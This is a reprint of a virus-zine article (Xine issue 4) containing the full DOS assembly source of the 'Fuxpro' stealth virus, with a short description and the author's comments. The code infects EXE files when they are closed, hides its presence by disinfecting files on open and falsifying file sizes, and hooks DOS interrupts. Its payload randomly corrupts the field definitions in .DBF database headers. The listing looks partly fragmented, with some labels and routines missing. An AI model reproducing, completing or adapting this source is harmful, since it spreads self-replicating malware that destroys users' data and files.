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Xine - issue #4 - Phile 306

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 · 7 months ago

| Xine - issue #4 - Phile 306 |

Comment ‘
º Name : Fuxpro º
º Alias : None º
º Origin: Paraguay º
º º
º This is a stealth virus. It infects EXE files when they are º
º closed and disinfects then when they're opened.It tunnels to º
º find the original Int 21h handler, with a routine similar to º
º the one used by the Killer Virus. It marks infected files º
º setting the seconds to 62. Installs his dummy error trapper. º
º The following text is found inside the virus code: º
º º
º [FUXPRO Virus by Int13h * MaDe In PaRaGuAy] º
º º
º This message is never displayed. The virus alters the header º
º of the files with extension .DBF when they are opened. The º
º .DBF is the extension for the database files, used by Foxpro, º
º DBase and many other database oriented languages. The virus º
º reads the header and modifies completelly the header randomi- º
º cally creating a quick caos in the user's database files. º
º º
ÈÍÍ[Analysis: Mikko Hiponnen, Data Fellows Ltd's FuckProt Prof.]Íͼ
; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;
; I haven't a description of the DBF header. I just looked at ;
; some .DBF files and then I found the header too easy to under-;
; stand and to make caos with it :) but with the DBF header des-;
; cription the joke can be multiplied.Sorry 4 my poor english.;
; Note that this is one of my old viruses, I put it here to ;
; fill some spaces :) ;
; ;
; cd 13 ;
; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;

.model tiny
jumps ; Fix it if u want. I am lazy :)
org 0h

ViralSize equ (offset MicroShit-offset Fuxpro)
ParraVir1 equ ((ViralSize+1034+15)/16)+1
ParraVir2 equ ((ViralSize+1034+15)/16)
ViralPara equ (ViralSize+15)/16

FUXPRO: call Delta
Delta: mov bx,sp
mov bp,ss:word ptr [bx]
inc sp
inc sp
sub bp,offset delta ; Get delta

mov ax,'FX' ; Are we alive?
int 21h

cmp ax,'PR'
je FuxproYaReside ; Yes, we r

push es
push ds
mov ax,3521h ; Grab int 21h's vector
int 21h
mov cs:[bp+word ptr Vieja21h],bx
mov cs:[bp+word ptr Vieja21h+2],es

mov ah,52h ; Look 4 the original entry point
int 21h
lds si,es:[bx+4]
lds si,ds:[si-4]
dec si
cmp word ptr ds:[si],0e18ah
jne Rastrear
cmp byte ptr ds:[si+2],0ebh
jne Rastrear
sub al,0fah
jnz Buscar_cli
cmp word ptr ds:[si],0fc80h
jne Buscar_cli
dec si
mov cs:[bp+word ptr Real21h],si
mov cs:[bp+word ptr Real21h+2],ds

pop ds

mov ax,ds
dec ax
mov es,ax
mov ax,es:[3]
sub ax,ParraVir1
xchg bx,ax
push ds
pop es

mov ah,4ah ; Free memory
int 21h

mov ah,48h ; Allocate mem
mov bx,ParraVir2
int 21h

dec ax
mov es,ax
mov word ptr es:[1],8 ; DOS's
inc ax
mov es,ax
xor di,di

push cs
pop ds
lea si,[bp+offset Fuxpro] ; Move virus to mem
mov cx,(ViralSize+1034)
rep movsb

int 03h ; What I am doing here? Ask TASM!

push es
pop ds
mov ax,2521h ; Hook the inty
mov dx,offset Maldita21h
int 21h

pop es

push es
pop ds
mov ax,es
add ax,10h ; Restore control to the hoste
add cs:[(bp+CS_IP)+2],ax

add ax,cs:[(bp+SS_SP)+2]
mov ss,ax
mov sp,cs:[(bp+SS_SP)]

xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
xor si,si
xor di,di
xor bp,bp

db 0ebh,0h
db 0eah
CS_IP dw offset MicroShit,0h
SS_SP dw 0,0

db ' [FUXPRO Virus by Int13h * MaDe In PaRaGuAy] '

mov ax,03d02h
call dword ptr cs:[Real21h] ; Open the database
xchg bx,ax

call HoOk_24h
call PointerToApocalipsis

or dx,dx
jnz Lectura ; Not too small please...

cmp ax,1666
jb Cancelar

Lectura:call PointerToGenesis
call Segmentos

mov ah,3fh
mov dx,offset Buffer ; Read 1024 bytes to our buffer
mov cx,1024
int 21h

mov si,dx
cmp byte ptr [si],3 ; It is a real .DBF? Usually begins
je Continuar ; with a 
cmp byte ptr [si],0f5h ; or a õ
jne Cancelar

mov si,offset Buffer ; Point to the buffer
mov cx,1024 ; Read the whole buffer
Again: dec cx
and cx,cx ; Check our counter
je Cancelar
lodsw ; Read a word
cmp ax,200dh ; It is the end of the header?
je Hallado
cmp ax,2a0dh ; Maybe the 1§ reg is deleted...
jne Again

Hallado:dec si ; Rewind a byte
mov di,si ; Save original position of EOH
mov byte ptr [si],42 ; Mark 1§ reg as deleted (02ah)
mov si,offset Buffer
add si,43 ; Go to the field descriptor
mov al,cs:[si] ; Read type in AL
call Cambiador ; Do some nasty changes on the header
cmp si,di ; Still below the End of Header?
jb Seguimos

call PointerToGenesis ; G0t0 BOF

mov ah,40h
mov dx,offset Buffer ; Write the modified header
mov cx,1024
int 21h

jmp Cancelar ; And g0 0n

cmp al,'C' ; Character field?
je Caracter
cmp al,'N' ; Numeric field?
je Numerico
cmp al,'D' ; Date field?
je Fecha
cmp al,'L' ; Logical field?
je Logical
add si,32 ; Point to the next field
ret ; and return to caller

Caracter: ; Play with character fields
in al,40h ; Read random byte from port 40h
cmp al,200
ja ParaRetornar ; If above than 200 nothing to do
cmp al,150 ; If between 150-200 cut the length
ja AlaMitad ; in the middle
cmp al,100 ; If between 100-150 then substract
ja Restarlo
and al,7 ; 0-7
test al,al ; 0?
jnz Sumarlo
mov al,3 ; Then, 3
Sumarlo:add byte ptr cs:[si+5],al ; Add AL, to the length of the field
jmp short ParaRetornar ; and return
mov al,byte ptr cs:[si+5] ; The number of characters
shr al,1 ; divide it
mov byte ptr cs:[si+5],al ; and write the new size
jmp short ParaRetornar ; dirty work finished
and al,7 ; 0-7
inc al ; can be 0, then INC
sub byte ptr cs:[si+5],al ; SUBstract AL from the current size
jmp short ParaRetornar

Numerico: ; Play with numeric fields
in al,40h ; Get the random byte
cmp al,166 ; If it is above than 166 return
ja Retorno
cmp al,66 ; If below than 66 then, set the random
jb Here ; number in the decimals field
Modify: mov byte ptr cs:[si],'C' ; If above than 66 convert the numeric
jmp short ParaRetornar ; field into a character one
Here: mov byte ptr cs:[si+6],al ; AL in the decimals field
Retorno:jmp short ParaRetornar

Fecha: in al,40h ; Play with Date fiels
cmp al,32 ; If random is less than 32 then
jb Modify ; converts the Date to Character
jmp short Retorno

Logical:in al,40h ; Play with Logical fields
cmp al,132
ja Retorno ; If below then 132 don't do nothing
mov byte ptr cs:[si],'M' ; Converts the Logical field to Memo
jmp short Retorno

mov ah,3eh ; Close the sucker
call dword ptr cs:[Real21h]

push cs
pop ds

mov ax,2524h ; Unhook the error handler
lds dx,dword ptr ds:[Vieja24h]
int 21h

pop es ds di si dx cx bx ax
jmp Interrupcion_21h

DeSiNfEcTaR: ; When a file is opened we check it...
push ax bx cx dx si di ds es

push ds
pop es
mov di,dx
mov cx,128
mov al,'.' ; Look 4 the period
repne scasb
jne Conti

xchg si,di
or ax,2020h
cmp ax,'bd' ; .DB?
jne Conti
or al,20h
cmp al,'f' ; .DBF?
je DescuajarLaCabeceraDelMalditoArchivoTipoDBF

Conti: mov ax,03d02h ; Open
call dword ptr cs:[Real21h] ; Emulate the int call
xchg bx,ax

mov ax,5700h
int 21h
mov word ptr cs:[Time],cx ; Infected?
mov word ptr cs:[Date],dx
and cl,00011111b
cmp cl,00011111b
jne Closear

call PointerToApocalipsis

sub ax,26
xchg dx,ax
mov cx,ax ; Positionate pointer at EOF
mov ax,4200h ; where there is our EXE header copy
int 21h

call Segmentos

mov ah,3fh
mov dx,offset Cabecera ; Read the header in our buffer
mov cx,1ah
int 21h

call PointerToApocalipsis

sub ax,ViralSize
xchg dx,ax
mov cx,ax ; Move pointer
mov ax,4200h
int 21h

call HoOk_24h ; To prevent...

mov ah,40h
xor cx,cx ; Cut the virus from the file
xor dx,dx
int 21h

call PointerToGenesis ; Pointer to BOF

mov ah,40h
mov cx,1ah
mov dx,offset Cabecera ; Write header
int 21h

mov ax,5701h
mov cx,word ptr [Time] ; Restore date and time
and cl,11100000b
or cl,1 ; Eliminate bad seconds
mov dx,word ptr [Date]
int 21h

Closear:mov ah,3eh ; Close the sucker
call dword ptr cs:[Real21h]

push cs
pop ds

lds dx,dword ptr ds:[Vieja24h]
mov ax,2524h
int 21h
pop es ds di si dx cx bx ax
jmp Interrupcion_21h

Stealth1: ; These routines are very common...
call dword ptr cs:[Real21h]
or al,al
jne FuckingErr

push ax
push bx
push es

mov ah,62h
int 21h

mov es,bx
cmp bx,es:[16h]
jne Napue

mov bx,dx
mov al,[bx]
push ax

mov ah,2fh
int 21h
pop ax
inc al
jne FCBOrdinario
add bx,7

mov al,byte ptr es:[bx+17h]
and al,00011111b
cmp al,00011111b
jne Napue

cmp word ptr es:[bx+1dh],(ViralSize+1024)
ja Restar

cmp word ptr es:[bx+1fh],0
je Napue

Restar: sub word ptr es:[bx+1dh],ViralSize
sbb word ptr es:[bx+1fh],0000
and byte ptr es:[bx+17h],1

Napue: pop es
pop bx
pop ax
retf 2

; My INT 21h handler

cmp ax,'FX' ; TSR checking
je ChEqUeO
cmp ah,3dh ; Opening
je DeSiNfEcTaR
cmp ah,3eh ; Closing
je InFeCtAr
cmp ah,11h ; Stealth me
je Stealth1
cmp ah,12h ; Stealth me
je Stealth1
cmp ah,4eh ; Stealth me
je Stealth2
cmp ah,4fh ; Stealth me
je Stealth2
db 0eah
Vieja21h dd 0
ChEqUeO:mov ax,'PR' ; You are TSR

call dword ptr cs:[Real21h]
jc Aqueronte

push ax
push es
push bx

mov ah,2fh
int 21h

mov ax,es:[bx+16h]
and al,00011111b
cmp al,00011111b
jne Grrr

cmp word ptr es:[bx+1ah],(ViralSize+1024)
jb Grrr

sub word ptr es:[bx+1ah],ViralSize
sbb word ptr es:[bx+1ch],0000
and byte ptr es:[bx+16h],1 ; Hide, hide, hide
Grrr: pop bx
pop es
pop ax
retf 2

cmp bx,4 ; 5 or above please
jbe AqUi

push ax bx cx dx si di ds es

call HoOk_24h

push bx
mov ax,1220h
int 2fh

mov ax,1216h
xor bh,bh
mov bl,es:[di]
int 2fh ; SFT
pop bx

cmp word ptr es:[di+29h],'EX'
jne PopAll
cmp byte ptr es:[di+28h],'E' ; .EXE?
jne PopAll

mov byte ptr es:[di+4],20h ; set attrib 20h
mov byte ptr es:[di+2],2 ; Read/write axs

mov word ptr cs:[Handle],bx
mov ax,5700h
int 21h
mov word ptr cs:[Time],cx
mov word ptr cs:[Date],dx
and cl,00011111b ; Infected?
cmp cl,00011111b
je PopAll

call Segmentos
call PointerToGenesis

mov ah,3fh
mov cx,1ah ; The header
mov dx,offset Cabecera
int 21h

mov si,dx
cmp word ptr [si],'ZM'
je IsEXE
cmp word ptr [si],'MZ'
jne PopAll ; MZ or ZM present?

IsEXE: cmp byte ptr [si+24],'@' ; Windoze sucks
jae PopAll

les ax,dword ptr [Cabecera+014h]
mov [CS_IP],ax
mov [CS_IP+2],es ; Grab important stuff
les ax,dword ptr [Cabecera+0eh]
mov word ptr [SS_SP],es
mov word ptr [SS_SP+2],ax

call Segmentos

call PointerToApocalipsis
push dx
push ax

cmp ax,1024 ; Not too small
jb PopAll

call HoOk_24h

mov ah,40h
mov bx,word ptr [Handle]
mov cx,ViralSize ; Add virus to EOF
xor dx,dx
int 21h

call PointerToGenesis

pop ax
pop dx
push dx
push ax

mov ax,word ptr [Cabecera+08h]
mov cl,4
shl ax,cl ; Modify header in the habitual way
xchg bx,ax
pop ax
pop dx
push ax
push dx
sub ax,bx
sbb dx,0
mov cx,10h
div cx
mov word ptr [Cabecera+014h],dx
mov word ptr [Cabecera+016h],ax
mov word ptr [Cabecera+0eh],ax
mov word ptr [Cabecera+010h],0

pop dx
pop ax

add ax,ViralSize
adc dx,0
mov cl,9
push ax
shr ax,cl
ror dx,cl

xchg bx,bx

adc dx,ax
pop ax
and ah,1
mov word ptr [Cabecera+4],dx
mov word ptr [Cabecera+2],ax

mov ax,word ptr [Cabecera+0ah]
add ax,ViralPara
jc Donotadd
mov word ptr [Cabecera+0ah],ax
mov word ptr [Cabecera+0Ch],0ffffh

mov bx,word ptr [Handle]
mov ah,40h
mov cx,01ah ; Write modified header
mov dx,offset Cabecera
int 21h

db 0b9h
Time dw 0
and cl,11100000b ; Restore time & date
or cl,00011111b ; set seconds to 62
db 0bah
Date dw 0
mov ax,5701h
int 21h

PopAll: push cs
pop ds

mov ax,2524h ; Unhook int 24h
lds dx,dword ptr [Vieja24h]
int 21h

pop es ds di si dx cx bx ax
Aqui: jmp Interrupcion_21h

push es
push bx

mov ax,3524h ; Trap the trapper
int 21h
mov word ptr cs:[Vieja24h],bx
mov word ptr cs:[Vieja24h+2],es
push cs
pop ds

mov ax,2524h
mov dx,offset Manejador24h
int 21h
pop bx
pop es

mov al,03 ; Nothing is wrong

push cs cs
pop ds es ; ES=DS=CS

mov ax,04200h ; BOF
jmp short Desplazar
mov ax,04202h ; EOF
xor cx,cx
int 21h

Cabecera db 01ah dup(0) ; The copy of the header will go here

Handle dw 0
Vieja24h dd 0
Real21h dd 0
Buffer db 1024 dup (0)
mov ax,4c00h
int 21h

;Virus Ú---------------¿
; Virus À---¿ |
; Virus Ü Ü | Ú----¿ |
; Virus ßÛÜ ÜÛß | | | |
;Ú-----------------¿ ßÛÜ ÜÛß | À----Ù |
;| Ú--¿ Ú-------¿ | ßÛÜ ÜÛß | |
;À-Ù | | À-Ù ßÛÜ ÜÛß | Ú---¿ Ú---Ù
; | À-----¿ ßÛÜÜÛß | | | |
; | Ú-----Ù ßÛÛß | | | À--¿ ÜßßßßßßÜ
; | | Ú-¿ Ú-¿ ÜÛÛÜ Ú--------¿ | | À--¿ | Û Û
; | | | | | | ÜÛßßÛÜ | Ú----¿ | | | | À-¿ Û Û
; | | | | | | ÜÛß ßÛÜ | | | | | | À-¿ | Û Û
; Ú-Ù À-¿ | À--Ù | ÜÛß ßÛÜ | À----Ù | | | | | ßÜÜÜÜÜÜß
; À------Ù À------ÙÜÛß ßÛÜ | Ú------Ù À-Ù À-Ù
; Ûß ßÛ | | C0d3d by Int13h
; | | M4d3 in P4r4gu4y
; | | South Am3ric4
; À-Ù

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